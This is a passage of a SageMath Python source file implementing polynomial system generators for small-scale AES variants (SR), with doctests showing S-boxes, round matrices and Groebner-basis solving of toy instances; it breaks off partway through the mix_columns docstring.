07d6c37d18811e2b377a9689790a7c5e24da16ba
|
[
"BSL-1.0"
] | null | null | null |
src/sage/crypto/mq/sr.py
|
vbraun/sage
|
07d6c37d18811e2b377a9689790a7c5e24da16ba
|
[
"BSL-1.0"
] | 7
|
2021-11-08T10:01:59.000Z
|
2022-03-03T11:25:52.000Z
|
r"""
Small Scale Variants of the AES (SR) Polynomial System Generator
Sage supports polynomial system generation for small scale (and full
scale) AES variants over `\GF{2}` and `\GF{2^e}`. Also, Sage supports
both the specification of SR as given in the papers [CMR2005]_ and
[CMR2006]_ and a variant of SR* which is equivalent to AES.
SR is a family of parameterizable variants of the AES suitable as a
framework for comparing different cryptanalytic techniques that can be
brought to bear on the AES. It is different from
:class:`Mini-AES <sage.crypto.block_cipher.miniaes.MiniAES>`, whose
purpose is as a teaching tool to help beginners understand the basic
structure and working of the full AES.
AUTHORS:
- Martin Albrecht (2008,2009-01): usability improvements
- Martin Albrecht (2007-09): initial version
- Niles Johnson (2010-08): (:trac:`3893`) ``random_element()`` should pass on ``*args`` and ``**kwds``.
EXAMPLES:
We construct SR(1,1,1,4) and study its properties.
::
sage: sr = mq.SR(1, 1, 1, 4)
``n`` is the number of rounds, ``r`` the number of rows in the
state array, ``c`` the number of columns in the state array, and ``e`` the
degree of the underlying field.
::
sage: sr.n, sr.r, sr.c, sr.e
(1, 1, 1, 4)
By default variables are ordered reverse to as they appear, e.g.::
sage: print(sr.R.repr_long())
Polynomial Ring
Base Ring : Finite Field in a of size 2^4
Size : 20 Variables
Block 0 : Ordering : deglex
Names : k100, k101, k102, k103, x100, x101, x102, x103, w100, w101, w102, w103, s000, s001, s002, s003, k000, k001, k002, k003
However, this can be prevented by passing in ``reverse_variables=False`` to the constructor.
For SR(1, 1, 1, 4) the ``ShiftRows`` matrix isn't that interesting.::
sage: sr.ShiftRows
[1 0 0 0]
[0 1 0 0]
[0 0 1 0]
[0 0 0 1]
Also, the ``MixColumns`` matrix is the identity matrix.::
sage: sr.MixColumns
[1 0 0 0]
[0 1 0 0]
[0 0 1 0]
[0 0 0 1]
``Lin``, however, is not the identity matrix.::
sage: sr.Lin
[ a^2 + 1 1 a^3 + a^2 a^2 + 1]
[ a a 1 a^3 + a^2 + a + 1]
[ a^3 + a a^2 a^2 1]
[ 1 a^3 a + 1 a + 1]
``M`` and ``Mstar`` are identical for SR(1, 1, 1, 4)::
sage: sr.M
[ a^2 + 1 1 a^3 + a^2 a^2 + 1]
[ a a 1 a^3 + a^2 + a + 1]
[ a^3 + a a^2 a^2 1]
[ 1 a^3 a + 1 a + 1]
::
sage: sr.Mstar
[ a^2 + 1 1 a^3 + a^2 a^2 + 1]
[ a a 1 a^3 + a^2 + a + 1]
[ a^3 + a a^2 a^2 1]
[ 1 a^3 a + 1 a + 1]
However, for larger instances of SR Mstar is not equal to M::
sage: sr = mq.SR(10,4,4,8)
sage: sr.Mstar == ~sr.MixColumns * sr.M
True
We can compute a Groebner basis for the ideals spanned by SR
instances to recover all solutions to the system.::
sage: sr = mq.SR(1,1,1,4, gf2=True, polybori=True)
sage: K = sr.base_ring()
sage: a = K.gen()
sage: K = [a]
sage: P = [1]
sage: F,s = sr.polynomial_system(P=P, K=K)
sage: F.groebner_basis()
[k100, k101 + 1, k102, k103 + k003,
x100 + 1, x101 + k003 + 1, x102 + k003 + 1,
x103 + k003, w100, w101, w102 + 1, w103 + k003 + 1,
s000 + 1, s001 + k003, s002 + k003, s003 + k003 + 1,
k000, k001, k002 + 1]
Note that the order of ``k000``, ``k001``, ``k002`` and ``k003`` is
little endian. Thus the result ``k002 + 1, k001, k000`` indicates that
the key is either `a` or `a+1`. We can verify that both keys encrypt P
to the same ciphertext::
sage: sr(P,[a])
[0]
sage: sr(P,[a+1])
[0]
All solutions can easily be recovered using the variety function for ideals.::
sage: I = F.ideal()
sage: for V in I.variety():
....: for k,v in sorted(V.items()):
....: print("{} {}".format(k, v))
....: print("\n")
k003 0
k002 1
k001 0
k000 0
s003 1
s002 0
s001 0
s000 1
w103 1
w102 1
w101 0
w100 0
x103 0
x102 1
x101 1
x100 1
k103 0
k102 0
k101 1
k100 0
<BLANKLINE>
k003 1
k002 1
k001 0
k000 0
s003 0
s002 1
s001 1
s000 1
w103 0
w102 1
w101 0
w100 0
x103 1
x102 0
x101 0
x100 1
k103 1
k102 0
k101 1
k100 0
We can also verify the correctness of the variety by evaluating all
ideal generators on all points.::
sage: for V in I.variety():
....: for f in I.gens():
....: if f.subs(V) != 0:
....: print("epic fail")
Note that the S-Box object for SR can be constructed with a call to ``sr.sbox()``::
sage: sr = mq.SR(1,1,1,4, gf2=True, polybori=True)
sage: S = sr.sbox()
For example, we can now study the difference distribution matrix of ``S``::
sage: S.difference_distribution_matrix()
[16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[ 0 2 2 2 2 0 0 0 2 0 0 0 2 4 0 0]
[ 0 2 0 4 2 2 2 0 0 2 0 0 0 0 0 2]
[ 0 2 4 0 0 2 0 0 2 2 0 2 0 0 2 0]
[ 0 0 2 0 4 2 0 0 0 0 2 0 2 0 2 2]
[ 0 0 0 2 0 0 0 2 4 2 0 0 2 0 2 2]
[ 0 4 0 0 0 2 0 2 0 2 2 0 2 2 0 0]
[ 0 2 0 0 0 0 2 0 0 0 0 2 4 2 2 2]
[ 0 2 2 0 0 0 2 2 2 0 2 0 0 0 0 4]
[ 0 0 2 2 0 0 0 0 0 2 2 4 0 2 0 2]
[ 0 0 2 0 2 0 2 2 0 4 0 2 2 0 0 0]
[ 0 0 0 0 2 0 2 0 2 2 4 0 0 2 2 0]
[ 0 0 0 2 0 4 2 0 2 0 2 2 2 0 0 0]
[ 0 0 0 0 2 2 0 4 2 0 0 2 0 2 0 2]
[ 0 0 2 2 0 2 4 2 0 0 0 0 0 2 2 0]
[ 0 2 0 2 2 0 0 2 0 0 2 2 0 0 4 0]
or use ``S`` to find alternative polynomial representations for the S-Box.::
sage: S.polynomials(degree=3)
[x0*x1 + x1*x2 + x0*x3 + x0*y2 + x1 + y0 + y1 + 1,
x0*x1 + x0*x2 + x0*y0 + x0*y1 + x0*y2 + x1 + x2 + y0 + y1 + y2,
x0*x1 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x1*y0 + x0*y1 + x0*y3,
x0*x1 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x1*y1 + x0*y3 + x1 + y0 + y1 + 1,
x0*x1 + x0*x2 + x0*y2 + x1*y2 + x0*y3 + x0 + x1,
x0*x3 + x1*x3 + x0*y1 + x0*y2 + x1*y3 + x0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x0*x1 + x1*x3 + x2*x3 + x0*y0 + x0*y2 + x0*y3 + x2 + y0 + y3,
x0*x1 + x0*x2 + x0*x3 + x1*x3 + x2*y0 + x0*y2 + x0 + x2 + x3 + y3,
x0*x3 + x1*x3 + x0*y0 + x2*y1 + x0*y2 + x3 + y3,
x0*x1 + x0*x2 + x0*y0 + x0*y1 + x2*y2 + x0*y3 + x1 + y0 + y1 + 1,
x0*x3 + x1*x3 + x0*y0 + x0*y1 + x0*y3 + x2*y3 + y0 + y3,
x0*x1 + x0*x2 + x3*y0 + x0*y1 + x0*y3 + y0,
x0*y0 + x0*y1 + x3*y1 + x0 + x2 + y0 + y3,
x0*y0 + x3*y2 + y0,
x0*x1 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x0*y2 + x3*y3 + y0,
x0*x2 + x0*x3 + x0*y1 + y0*y1 + x0*y3 + x2 + x3 + y3,
x0*x2 + x0*y0 + y0*y2 + x0*y3 + x0 + y0,
x0*x1 + x0*x2 + x1*x3 + x0*y2 + y0*y3 + y0,
x0*x1 + x0*y0 + y1*y2 + x0*y3 + x1 + x2 + y0 + 1,
x0*x2 + x1*x3 + x0*y1 + x0*y2 + x0*y3 + y1*y3 + x0 + y0 + y3,
x0*x1 + x0*x2 + x0*x3 + x0*y1 + x0*y2 + x0*y3 + y2*y3 + x0 + x1 + x2 + x3 + y1 + y3 + 1,
x0*x1*x2 + x0*x3 + x0*y0 + x0*y1 + x0*y2 + x0,
x0*x1*x3 + x0*x2 + x0*x3 + x0*y1 + x0*y3 + x0,
x0*x1*y0 + x0*x1 + x0*y0 + x0,
x0*x1*y1,
x0*x1*y2 + x0*x2 + x0*y2 + x0*y3 + x0,
x0*x1*y3 + x0*x1 + x0*x3 + x0*y0 + x0*y1 + x0*y2 + x0,
x0*x2*x3 + x0*x1 + x0*x3 + x0*y1 + x0*y2 + x0*y3 + x0,
x0*x2*y0 + x0*x1 + x0*x2 + x0*x3 + x0*y1 + x0*y2,
x0*x2*y1 + x0*x2 + x0*x3 + x0*y0 + x0*y1 + x0*y2 + x0,
x0*x2*y2 + x0*x2 + x0*y3 + x0,
x0*x2*y3 + x0*x2 + x0*y3 + x0,
x0*x3*y0 + x0*x1 + x0*x2 + x0*y0 + x0*y1 + x0*y3,
x0*x3*y1 + x0*x2 + x0*y1 + x0*y3 + x0,
x0*x3*y2,
x0*x3*y3 + x0*x1 + x0*y1 + x0*y2 + x0*y3 + x0,
x0*y0*y1 + x0*y1,
x0*y0*y2 + x0*x2 + x0*y3 + x0,
x0*y0*y3 + x0*x1 + x0*x3 + x0*y0 + x0*y1 + x0*y2 + x0*y3 + x0,
x0*y1*y2 + x0*x2 + x0*y3 + x0,
x0*y1*y3 + x0*x3 + x0*y0 + x0*y2 + x0*y3,
x0*y2*y3 + x0*y2,
x1*x2*x3 + x0*x1 + x1*x3 + x0*y0 + x0*y1 + x2 + x3 + y3,
x1*x2*y0 + x0*x1 + x1*x3 + x0*y0 + x0*y1 + x2 + x3 + y3,
x1*x2*y1 + x0*x1 + x1*x3 + x0*y0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x1*x2*y2 + x0*x1 + x0*y0 + x0*y1 + x0 + x1 + y0 + y1 + 1,
x1*x2*y3 + x0*x1 + x1*x3 + x0*y0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x1*x3*y0 + x0*x1 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x0*y1 + x0*y3,
x1*x3*y1 + x0*x2 + x0*x3 + x0*y3 + x2 + x3 + y3,
x1*x3*y2 + x0*x2 + x0*x3 + x1*x3 + x0*y1 + x0*y3 + x0,
x1*x3*y3 + x0*x1 + x0*x2 + x0*x3 + x0*y0 + x0*y1 + x0*y3,
x1*y0*y1 + x0*x2 + x0*x3 + x0*y3 + x2 + x3 + y3,
x1*y0*y2 + x0*x2 + x0*x3 + x1*x3 + x0*y1 + x0*y3 + x0,
x1*y0*y3,
x1*y1*y2 + x0*x1 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x0*y3 + x1 + y0 + y1 + 1,
x1*y1*y3 + x0*x1 + x1*x3 + x0*y0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x1*y2*y3 + x0*x1 + x0*x2 + x1*x3 + x0*y0 + x0*y2 + x0*y3 + x0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x2*x3*y0 + x0*x1 + x0*x3 + x1*x3 + x0*y2 + x0*y3 + x2 + x3 + y3,
x2*x3*y1 + x0*y1 + x0*y2 + x0*y3 + x3 + y0,
x2*x3*y2 + x1*x3 + x0*y1 + x0 + x2 + x3 + y3,
x2*x3*y3,
x2*y0*y1 + x0*x2 + x0*x3 + x0*y0 + x0*y1 + x0*y2 + x0,
x2*y0*y2 + x0*x2 + x1*x3 + x0*y1 + x0*y3 + x2 + x3 + y3,
x2*y0*y3 + x0*x2 + x0*y3 + x0,
x2*y1*y2 + x0*x1 + x0*x2 + x1*x3 + x0*y0 + x0*y3 + x0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x2*y1*y3 + x0*x3 + x1*x3 + x0*y0 + x0*y1 + x0*y3 + y0 + y3,
x2*y2*y3 + x0*x1 + x0*x2 + x1*x3 + x0*y0 + x0*y3 + x0 + x1 + x2 + x3 + y0 + y1 + y3 + 1,
x3*y0*y1 + x0*x3 + x0*y1 + x0 + x2 + x3 + y3,
x3*y0*y2 + x0*y0 + y0,
x3*y0*y3 + x1*x3 + x0*y1 + x0*y2 + x0*y3 + y0,
x3*y1*y2 + x0*x2 + x0*x3 + x0*y3 + x2 + x3 + y3,
x3*y1*y3 + x0*x2 + x0*x3 + x0*y0 + x0*y2 + x0,
x3*y2*y3 + x0*x2 + x0*x3 + x1*x3 + x0*y0 + x0*y1 + x0*y3 + x0 + y0,
y0*y1*y2 + x0*x3 + x0 + x2 + x3 + y3,
y0*y1*y3 + x0*x3 + x0*y0 + x0*y2 + x0*y3,
y0*y2*y3 + x0*x3 + x1*x3 + x0*y0 + x0*y1 + y0,
y1*y2*y3 + x0*x1 + x0*x2 + x1*x3 + x0*y0 + x0*y3 + x0 + x1 + x2 + x3 + y0 + y1 + y3 + 1]
sage: S.interpolation_polynomial()
(a^2 + 1)*x^14 + x^13 + (a^3 + a^2)*x^11 + (a^2 + 1)*x^7 + a^2 + a
The :class:`SR_gf2_2` gives an example how use alternative polynomial
representations of the S-Box for construction of polynomial systems.
TESTS::
sage: sr == loads(dumps(sr))
True
REFERENCES:
- [CMR2005]_
- [CMR2006]_
- [MR2002]_
"""
# python3
from __future__ import division, print_function, absolute_import
from six.moves import range
from six import integer_types
from sage.rings.finite_rings.finite_field_constructor import FiniteField as GF
from sage.rings.integer_ring import ZZ
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing, BooleanPolynomialRing_constructor as BooleanPolynomialRing
from sage.matrix.matrix import is_Matrix
from sage.matrix.constructor import Matrix, random_matrix
from sage.matrix.matrix_space import MatrixSpace
from sage.misc.misc import get_verbose
from sage.misc.flatten import flatten
from sage.modules.vector_modn_dense import Vector_modn_dense
from sage.rings.polynomial.multi_polynomial_sequence import PolynomialSequence
from .mpolynomialsystemgenerator import MPolynomialSystemGenerator
from sage.rings.polynomial.term_order import TermOrder
from sage.structure.richcmp import richcmp_not_equal, rich_to_bool, op_LT
def SR(n=1, r=1, c=1, e=4, star=False, **kwargs):
r"""
Return a small scale variant of the AES polynomial system
constructor subject to the following conditions:
INPUT:
- ``n`` - the number of rounds (default: 1)
- ``r`` - the number of rows in the state array (default: 1)
- ``c`` - the number of columns in the state array (default: 1)
- ``e`` - the exponent of the finite extension field (default: 4)
- ``star`` - determines if SR\* or SR should be constructed (default: ``False``)
- ``aes_mode`` - as the SR key schedule specification differs
slightly from the AES key schedule, this parameter controls
which schedule to use (default: ``True``)
- ``gf2`` - generate polynomial systems over `\GF{2}` rather than
over `\GF{2^e}` (default: ``False``)
- ``polybori`` - use the ``BooleanPolynomialRing`` as polynomial
representation (default: ``True``, `\GF{2}` only)
- ``order`` - a string to specify the term ordering of the
variables (default: ``deglex``)
- ``postfix`` - a string which is appended after the variable name
(default: '')
- ``allow_zero_inversions`` - a boolean to control whether zero
inversions raise an exception (default: ``False``)
- ``correct_only`` - only include correct inversion polynomials
(default: ``False``, `\GF{2}` only)
- ``biaffine_only`` - only include bilinear and biaffine inversion
polynomials (default: ``True``, `\GF{2}` only)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4)
sage: ShiftRows = sr.shift_rows_matrix()
sage: MixColumns = sr.mix_columns_matrix()
sage: Lin = sr.lin_matrix()
sage: M = MixColumns * ShiftRows * Lin
sage: print(sr.hex_str_matrix(M))
5 1 C 5
2 2 1 F
A 4 4 1
1 8 3 3
::
sage: sr = mq.SR(1, 2, 1, 4)
sage: ShiftRows = sr.shift_rows_matrix()
sage: MixColumns = sr.mix_columns_matrix()
sage: Lin = sr.lin_matrix()
sage: M = MixColumns * ShiftRows * Lin
sage: print(sr.hex_str_matrix(M))
F 3 7 F A 2 B A
A A 5 6 8 8 4 9
7 8 8 2 D C C 3
4 6 C C 5 E F F
A 2 B A F 3 7 F
8 8 4 9 A A 5 6
D C C 3 7 8 8 2
5 E F F 4 6 C C
::
sage: sr = mq.SR(1, 2, 2, 4)
sage: ShiftRows = sr.shift_rows_matrix()
sage: MixColumns = sr.mix_columns_matrix()
sage: Lin = sr.lin_matrix()
sage: M = MixColumns * ShiftRows * Lin
sage: print(sr.hex_str_matrix(M))
F 3 7 F 0 0 0 0 0 0 0 0 A 2 B A
A A 5 6 0 0 0 0 0 0 0 0 8 8 4 9
7 8 8 2 0 0 0 0 0 0 0 0 D C C 3
4 6 C C 0 0 0 0 0 0 0 0 5 E F F
A 2 B A 0 0 0 0 0 0 0 0 F 3 7 F
8 8 4 9 0 0 0 0 0 0 0 0 A A 5 6
D C C 3 0 0 0 0 0 0 0 0 7 8 8 2
5 E F F 0 0 0 0 0 0 0 0 4 6 C C
0 0 0 0 A 2 B A F 3 7 F 0 0 0 0
0 0 0 0 8 8 4 9 A A 5 6 0 0 0 0
0 0 0 0 D C C 3 7 8 8 2 0 0 0 0
0 0 0 0 5 E F F 4 6 C C 0 0 0 0
0 0 0 0 F 3 7 F A 2 B A 0 0 0 0
0 0 0 0 A A 5 6 8 8 4 9 0 0 0 0
0 0 0 0 7 8 8 2 D C C 3 0 0 0 0
0 0 0 0 4 6 C C 5 E F F 0 0 0 0
"""
if not kwargs.get("gf2", False):
return SR_gf2n(n, r, c, e, star, **kwargs)
else:
return SR_gf2(n, r, c, e, star, **kwargs)
class SR_generic(MPolynomialSystemGenerator):
def __init__(self, n=1, r=1, c=1, e=4, star=False, **kwargs):
"""
Small Scale Variants of the AES.
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4)
sage: ShiftRows = sr.shift_rows_matrix()
sage: MixColumns = sr.mix_columns_matrix()
sage: Lin = sr.lin_matrix()
sage: M = MixColumns * ShiftRows * Lin
sage: print(sr.hex_str_matrix(M))
5 1 C 5
2 2 1 F
A 4 4 1
1 8 3 3
"""
if n-1 not in range(10):
raise TypeError("n must be between 1 and 10 (inclusive)")
self._n = n
if r not in (1, 2, 4):
raise TypeError("r must be in (1, 2, 4)")
self._r = r
if c not in (1, 2, 4):
raise TypeError("c must be in (1, 2, 4)")
self._c = c
if e not in (4, 8):
raise TypeError("e must be either 4 or 8")
self._e = e
self._star = bool(star)
self._base = self.base_ring()
self._postfix = kwargs.get("postfix", "")
self._order = kwargs.get("order", "deglex")
self._aes_mode = kwargs.get("aes_mode", True)
self._gf2 = kwargs.get("gf2", False)
self._allow_zero_inversions = bool(kwargs.get("allow_zero_inversions", False))
self._reverse_variables = bool(kwargs.get("reverse_variables", True))
with AllowZeroInversionsContext(self):
sub_byte_lookup = dict([(e, self.sub_byte(e)) for e in self._base])
self._sub_byte_lookup = sub_byte_lookup
if self._gf2:
self._polybori = kwargs.get("polybori", True)
def new_generator(self, **kwds):
r"""
Return a new ``SR`` instance equal to this instance
except for the parameters passed explicitly to this function.
INPUT:
- ``**kwds`` - see the ``SR`` constructor for accepted
parameters
EXAMPLES::
sage: sr = mq.SR(2,1,1,4); sr
SR(2,1,1,4)
sage: sr.ring().base_ring()
Finite Field in a of size 2^4
::
sage: sr2 = sr.new_generator(gf2=True); sr2
SR(2,1,1,4)
sage: sr2.ring().base_ring()
Finite Field of size 2
sage: sr3 = sr2.new_generator(correct_only=True)
sage: len(sr2.inversion_polynomials_single_sbox())
20
sage: len(sr3.inversion_polynomials_single_sbox())
19
"""
kwds.setdefault("n", self._n)
kwds.setdefault("r", self._r)
kwds.setdefault("c", self._c)
kwds.setdefault("e", self._e)
kwds.setdefault("star", self._star)
kwds.setdefault("postfix", self._postfix)
kwds.setdefault("order", self._order)
kwds.setdefault("allow_zero_inversions", self._allow_zero_inversions)
kwds.setdefault("aes_mode", self._aes_mode)
kwds.setdefault("gf2", self._gf2)
kwds.setdefault("reverse_variables", self._reverse_variables)
try:
polybori = self._polybori
except AttributeError:
polybori = False
kwds.setdefault("polybori", polybori)
try:
correct_only = self._correct_only
except AttributeError:
correct_only = False
kwds.setdefault("correct_only", correct_only)
try:
biaffine_only = self._biaffine_only
except AttributeError:
biaffine_only = False
kwds.setdefault("biaffine_only", biaffine_only)
if self._gf2 == kwds.get('gf2'):
return self.__class__(**kwds)
else:
return SR(**kwds)
def __getattr__(self, attr):
"""
EXAMPLES::
sage: sr = mq.SR(1, 2, 1, 4, gf2=True)
sage: sr.Mstar
[1 0 1 1 0 0 0 0]
[1 1 0 1 0 0 0 0]
[1 1 1 0 0 0 0 0]
[0 1 1 1 0 0 0 0]
[0 0 0 0 1 0 1 1]
[0 0 0 0 1 1 0 1]
[0 0 0 0 1 1 1 0]
[0 0 0 0 0 1 1 1]
"""
if attr == "e":
return self._e
elif attr == "c":
return self._c
elif attr == "n":
return self._n
elif attr == "r":
return self._r
elif attr == "R":
self.R = self.ring()
return self.R
elif attr == "k":
self.k = self.base_ring()
return self.k
elif attr == "Lin":
self.Lin = self.lin_matrix()
return self.Lin
elif attr == "ShiftRows":
self.ShiftRows = self.shift_rows_matrix()
return self.ShiftRows
elif attr == "MixColumns":
self.MixColumns = self.mix_columns_matrix()
return self.MixColumns
elif attr == "M":
self.M = self.MixColumns * self.ShiftRows * self.Lin
return self.M
elif attr == "Mstar":
self.Mstar = self.ShiftRows * self.Lin
return self.Mstar
raise AttributeError("%s has no attribute %s"%(type(self), attr))
def _repr_(self):
"""
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4); sr #indirect doctest
SR(1,2,2,4)
sage: sr = mq.SR(1, 2, 2, 4, star=True); sr
SR*(1,2,2,4)
"""
if self._star:
return "SR*(%d,%d,%d,%d)"%(self._n, self._r, self._c, self._e)
else:
return "SR(%d,%d,%d,%d)"%(self._n, self._r, self._c, self._e)
def base_ring(self):
r"""
Return the base field of self as determined by
``self.e``.
EXAMPLES::
sage: sr = mq.SR(10, 2, 2, 4)
sage: sr.base_ring().polynomial()
a^4 + a + 1
The Rijndael polynomial::
sage: sr = mq.SR(10, 4, 4, 8)
sage: sr.base_ring().polynomial()
a^8 + a^4 + a^3 + a + 1
"""
try:
return self._base
except AttributeError:
if self._e == 4:
self._base = GF(2**4, 'a', modulus=(1, 1, 0, 0, 1))
elif self._e == 8:
self._base = GF(2**8, 'a', modulus=(1, 1, 0, 1, 1, 0, 0, 0, 1))
return self._base
def __cmp__(self, other):
"""
Two generators are considered equal if they agree on all parameters
passed to them during construction.
EXAMPLES::
sage: sr1 = mq.SR(2, 2, 2, 4)
sage: sr2 = mq.SR(2, 2, 2, 4)
sage: sr1 == sr2
True
::
sage: sr1 = mq.SR(2, 2, 2, 4)
sage: sr2 = mq.SR(2, 2, 2, 4, gf2=True)
sage: sr1 == sr2
False
"""
for name in ['n', 'r', 'c', 'e', '_postfix', '_order',
'_allow_zero_inversions', '_aes_mode', '_gf2', '_star']:
lx = getattr(self, name)
rx = getattr(other, name)
if lx != rx:
return 1 if richcmp_not_equal(lx, rx, op_LT) else -1
return 0
def sub_bytes(self, d):
r"""
Perform the non-linear transform on ``d``.
INPUT:
- ``d`` - state array or something coercible to a state array
EXAMPLES::
sage: sr = mq.SR(2, 1, 2, 8, gf2=True)
sage: k = sr.base_ring()
sage: A = Matrix(k, 1, 2 , [k(1), k.gen()])
sage: sr.sub_bytes(A)
[ a^6 + a^5 + a^4 + a^3 + a^2 a^6 + a^5 + a^4 + a^2 + a + 1]
"""
d = self.state_array(d)
return Matrix(self.base_ring(), d.nrows(), d.ncols(), [self.sub_byte(b) for b in d.list()])
def sub_byte(self, b):
r"""
Perform ``SubByte`` on a single byte/halfbyte ``b``.
A ``ZeroDivision`` exception is raised if an attempt is made
to perform an inversion on the zero element. This can be
disabled by passing ``allow_zero_inversion=True`` to the
constructor. A zero inversion can result in an inconsistent
equation system.
INPUT:
- ``b`` - an element in ``self.base_ring()``
EXAMPLES:
The S-Box table for `\GF{2^4}`::
sage: sr = mq.SR(1, 1, 1, 4, allow_zero_inversions=True)
sage: for e in sr.base_ring():
....: print('% 20s % 20s'%(e, sr.sub_byte(e)))
0 a^2 + a
a a^2 + 1
a^2 a
a^3 a^3 + 1
a + 1 a^2
a^2 + a a^2 + a + 1
a^3 + a^2 a + 1
a^3 + a + 1 a^3 + a^2
a^2 + 1 a^3 + a^2 + a
a^3 + a a^3 + a^2 + a + 1
a^2 + a + 1 a^3 + a
a^3 + a^2 + a 0
a^3 + a^2 + a + 1 a^3
a^3 + a^2 + 1 1
a^3 + 1 a^3 + a^2 + 1
1 a^3 + a + 1
"""
if not b:
if not self._allow_zero_inversions:
raise ZeroDivisionError("A zero inversion occurred during an encryption or key schedule.")
else:
return self.sbox_constant()
try:
return self._sub_byte_lookup[b]
except AttributeError:
e = self.e
k = self.k
# inversion
b = b ** ( 2**e - 2 )
# GF(2) linear map
if e == 4:
if not hasattr(self, "_L"):
self._L = Matrix(GF(2), 4, 4, [[1, 1, 1, 0],
[0, 1, 1, 1],
[1, 0, 1, 1],
[1, 1, 0, 1]])
elif e==8:
if not hasattr(self, "_L"):
self._L = Matrix(GF(2), 8, 8, [[1, 0, 0, 0, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 1],
[1, 1, 1, 1, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 1, 1, 1, 1, 1]])
b = k(self._L * b._vector_())
# constant addition
if e == 4:
b = b + k.fetch_int(6)
elif e == 8:
b = b + k.fetch_int(99)
return b
def sbox_constant(self):
"""
Return the S-Box constant which is added after `L(x^{-1})` was
performed. That is ``0x63`` if ``e == 8`` or ``0x6`` if ``e ==
4``.
EXAMPLES::
sage: sr = mq.SR(10, 1, 1, 8)
sage: sr.sbox_constant()
a^6 + a^5 + a + 1
"""
k = self.k
if self.e == 4:
return k.fetch_int(6)
elif self.e == 8:
return k.fetch_int(99)
else:
raise TypeError("sbox constant only defined for e in (4, 8)")
def sbox(self, inversion_only=False):
r"""
Return an S-Box object for this SR instance.
INPUT:
- ``inversion_only`` - do not include the `\GF{2}` affine map when
computing the S-Box (default: ``False``)
EXAMPLES::
sage: sr = mq.SR(1,2,2,4, allow_zero_inversions=True)
sage: S = sr.sbox(); S
(6, 11, 5, 4, 2, 14, 7, 10, 9, 13, 15, 12, 3, 1, 0, 8)
sage: sr.sub_byte(0)
a^2 + a
sage: sage_eval(str(sr.sub_byte(0)), {'a':2})
6
sage: S(0)
6
sage: sr.sub_byte(1)
a^3 + a + 1
sage: sage_eval(str(sr.sub_byte(1)), {'a':2})
11
sage: S(1)
11
sage: sr = mq.SR(1,2,2,8, allow_zero_inversions=True)
sage: S = sr.sbox(); S
(99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43,
254, 215, 171, 118, 202, 130, 201, 125, 250, 89, 71, 240,
173, 212, 162, 175, 156, 164, 114, 192, 183, 253, 147, 38,
54, 63, 247, 204, 52, 165, 229, 241, 113, 216, 49, 21, 4,
199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, 235, 39,
178, 117, 9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214,
179, 41, 227, 47, 132, 83, 209, 0, 237, 32, 252, 177, 91,
106, 203, 190, 57, 74, 76, 88, 207, 208, 239, 170, 251,
67, 77, 51, 133, 69, 249, 2, 127, 80, 60, 159, 168, 81,
163, 64, 143, 146, 157, 56, 245, 188, 182, 218, 33, 16,
255, 243, 210, 205, 12, 19, 236, 95, 151, 68, 23, 196,
167, 126, 61, 100, 93, 25, 115, 96, 129, 79, 220, 34, 42,
144, 136, 70, 238, 184, 20, 222, 94, 11, 219, 224, 50, 58,
10, 73, 6, 36, 92, 194, 211, 172, 98, 145, 149, 228, 121,
231, 200, 55, 109, 141, 213, 78, 169, 108, 86, 244, 234,
101, 122, 174, 8, 186, 120, 37, 46, 28, 166, 180, 198,
232, 221, 116, 31, 75, 189, 139, 138, 112, 62, 181, 102,
72, 3, 246, 14, 97, 53, 87, 185, 134, 193, 29, 158, 225,
248, 152, 17, 105, 217, 142, 148, 155, 30, 135, 233, 206,
85, 40, 223, 140, 161, 137, 13, 191, 230, 66, 104, 65,
153, 45, 15, 176, 84, 187, 22)
sage: sr.sub_byte(0)
a^6 + a^5 + a + 1
sage: sage_eval(str(sr.sub_byte(0)), {'a':2})
99
sage: S(0)
99
sage: sr.sub_byte(1)
a^6 + a^5 + a^4 + a^3 + a^2
sage: sage_eval(str(sr.sub_byte(1)), {'a':2})
124
sage: S(1)
124
sage: sr = mq.SR(1,2,2,4, allow_zero_inversions=True)
sage: S = sr.sbox(inversion_only=True); S
(0, 1, 9, 14, 13, 11, 7, 6, 15, 2, 12, 5, 10, 4, 3, 8)
sage: S(0)
0
sage: S(1)
1
sage: S(sr.k.gen())
a^3 + 1
"""
from sage.crypto.sbox import SBox
k = self.base_ring()
if not inversion_only:
with AllowZeroInversionsContext(self):
S = [self.sub_byte(elem) for elem in sorted(k)]
return SBox(S)
else:
e = self.e
S = [elem ** (2**e - 2) for elem in sorted(k)]
return SBox(S)
def shift_rows(self, d):
r"""
Perform the ``ShiftRows`` operation on ``d``.
INPUT:
- ``d`` - state array or something coercible to a state array
EXAMPLES::
sage: sr = mq.SR(10, 4, 4, 4)
sage: E = sr.state_array() + 1; E
[1 0 0 0]
[0 1 0 0]
[0 0 1 0]
[0 0 0 1]
::
sage: sr.shift_rows(E)
[1 0 0 0]
[1 0 0 0]
[1 0 0 0]
[1 0 0 0]
"""
d = self.state_array(d)
ret = []
for i in range(d.nrows()):
ret += list(d.row(i)[i%d.ncols():]) + list(d.row(i)[:i%d.ncols()])
return Matrix(self.base_ring(), self._r, self._c, ret)
def mix_columns(self, d):
r"""
Perform the ``MixColumns`` operation on
``d``.
INPUT:
- ``d`` - state array or something coercible to a
state array
EXAMPLES::
